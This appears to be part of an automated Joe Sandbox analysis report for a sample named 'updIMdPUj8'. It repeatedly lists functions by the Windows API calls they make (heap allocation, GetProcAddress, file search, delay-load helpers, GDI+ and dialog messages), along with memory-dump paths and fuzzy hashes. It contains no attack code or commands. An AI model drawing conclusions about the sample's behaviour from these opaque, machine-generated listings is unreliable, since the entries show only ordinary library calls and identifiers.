                                                                                                                                                                          • Instruction Fuzzy Hash: 3B319C75C11259AACF15DF68D891AEEBBF4AF19300F2044EEE409B3242D735AF04CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B4ACF8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                                                          • Opcode ID: fa126287197aaab2f837d23aeb16a9e5ec79d9dd50bdf96f59f5559d03b535df
                                                                                                                                                                          • Instruction ID: 99eb85aed6fa2f772e3ed118de86589079c9e63142033b39d50dbd8a0dd0d0c5
                                                                                                                                                                          • Opcode Fuzzy Hash: fa126287197aaab2f837d23aeb16a9e5ec79d9dd50bdf96f59f5559d03b535df
                                                                                                                                                                          • Instruction Fuzzy Hash: 30110A33A402256F9B259F18DC9095A73D5EB84361B1A41A0FD15AB295DB30DE01E7D2
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 61744e8ef18977801b8cf9d8fe370c204a1a40c2d23fc57e1ec70b7f45b6785d
                                                                                                                                                                          • Instruction ID: ae0f4681771d54a44be9363f69de9c1e564b61ad379ac960a755b95e149537cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 61744e8ef18977801b8cf9d8fe370c204a1a40c2d23fc57e1ec70b7f45b6785d
                                                                                                                                                                          • Instruction Fuzzy Hash: 90015233910538EBCF16EBA8DC82ADEB7B5EF98750F0145A5E81EB7152DA34CD1486A0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B4B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B49813,00000001,00000364,?,00B43F73,00000050,?,00B61030,00000200), ref: 00B4B177
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C4E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                          • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                                                                          • Instruction ID: d8601390803d997f578577ec2bfc5b2d0ef18cc20c21c20036901e4cfef0864c
                                                                                                                                                                          • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                                                                          • Instruction Fuzzy Hash: 900122722003056BE3318E698881A6AFBE8EB85330F250A6DE18493281EB30AA05C724
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B49813,00000001,00000364,?,00B43F73,00000050,?,00B61030,00000200), ref: 00B4B177
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: a97e50290349fde0262e5ff43a0228682ce987c8b6cafe6adbbaa06ee1aa3d83
                                                                                                                                                                          • Instruction ID: 308f3ea0936fbd9730e753bda2385fe21b3a69f7cf96e399090410d36c4de58c
                                                                                                                                                                          • Opcode Fuzzy Hash: a97e50290349fde0262e5ff43a0228682ce987c8b6cafe6adbbaa06ee1aa3d83
                                                                                                                                                                          • Instruction Fuzzy Hash: 45F0B43252512477DB255B35AC55F5F37C8EF41760B1881D1B908B7190CF30DB01A6E0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B43C3F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                                                          • Opcode ID: 252597b46e0509695469af20991bceb8f9577c32e5a350ae497a9c2179c72b35
                                                                                                                                                                          • Instruction ID: 4fbb365423487686cb0183c006198cd0ac290d0648597bd4c9aa6aeccf456f92
                                                                                                                                                                          • Opcode Fuzzy Hash: 252597b46e0509695469af20991bceb8f9577c32e5a350ae497a9c2179c72b35
                                                                                                                                                                          • Instruction Fuzzy Hash: E9F0A0362003269F8F118EA8EC40A9A77E9EF01F617184164FA15E7191DB31EB20EBD0
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B4CA2C,00000000,?,00B46CBE,?,00000008,?,00B491E0,?,?,?), ref: 00B48E38
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B25AC2
                                                                                                                                                                            • Part of subcall function 00B2B505: __EH_prolog.LIBCMT ref: 00B2B50A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B2A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6C4
                                                                                                                                                                            • Part of subcall function 00B2A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6F2
                                                                                                                                                                            • Part of subcall function 00B2A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6FE
                                                                                                                                                                          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B2A598
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1464966427-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 00B30E3D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExecutionStateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2211380416-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GdipAlloc.GDIPLUS(00000010), ref: 00B3A62C
                                                                                                                                                                            • Part of subcall function 00B3A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B3A3DA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1915507550-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • DloadProtectSection.DELAYIMP ref: 00B3E5E3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DloadProtectSection
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2203082970-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00B31B3E), ref: 00B3DD92
                                                                                                                                                                            • Part of subcall function 00B3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B3B579
                                                                                                                                                                            • Part of subcall function 00B3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3B58A
                                                                                                                                                                            • Part of subcall function 00B3B568: IsDialogMessageW.USER32(0001046A,?), ref: 00B3B59E
                                                                                                                                                                            • Part of subcall function 00B3B568: TranslateMessage.USER32(?), ref: 00B3B5AC
                                                                                                                                                                            • Part of subcall function 00B3B568: DispatchMessageW.USER32(?), ref: 00B3B5B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 897784432-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileType.KERNELBASE(000000FF,00B297BE), ref: 00B298C8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileType
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3081899298-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 33dbf7a401a5083e263da67f06e6b7d1671be410be53e4a49af4a780a61bd9fa
                                                                                                                                                                          • Instruction ID: b365921d7777cf87f52795afef66acaa8870e957e8a1b53e77a4f3b99bb20597
                                                                                                                                                                          • Opcode Fuzzy Hash: 33dbf7a401a5083e263da67f06e6b7d1671be410be53e4a49af4a780a61bd9fa
                                                                                                                                                                          • Instruction Fuzzy Hash: CEB012E2258100EC314471462C07D3711CED0C4F1173040FFFC25D00D0F840ED080531
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: d140903eb5aad0609c6ad5578578ed8f45556dce63e17d58f1b41356be19b58f
                                                                                                                                                                          • Instruction ID: 060c9860ca44d7f03b6af6de8d12e643147139f2ccf911e2b716fb0afe4adbbb
                                                                                                                                                                          • Opcode Fuzzy Hash: d140903eb5aad0609c6ad5578578ed8f45556dce63e17d58f1b41356be19b58f
                                                                                                                                                                          • Instruction Fuzzy Hash: 8AB092A2258200AC218461456806D3711CEC084F11B3041EBB825D00D0A840A9480631
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
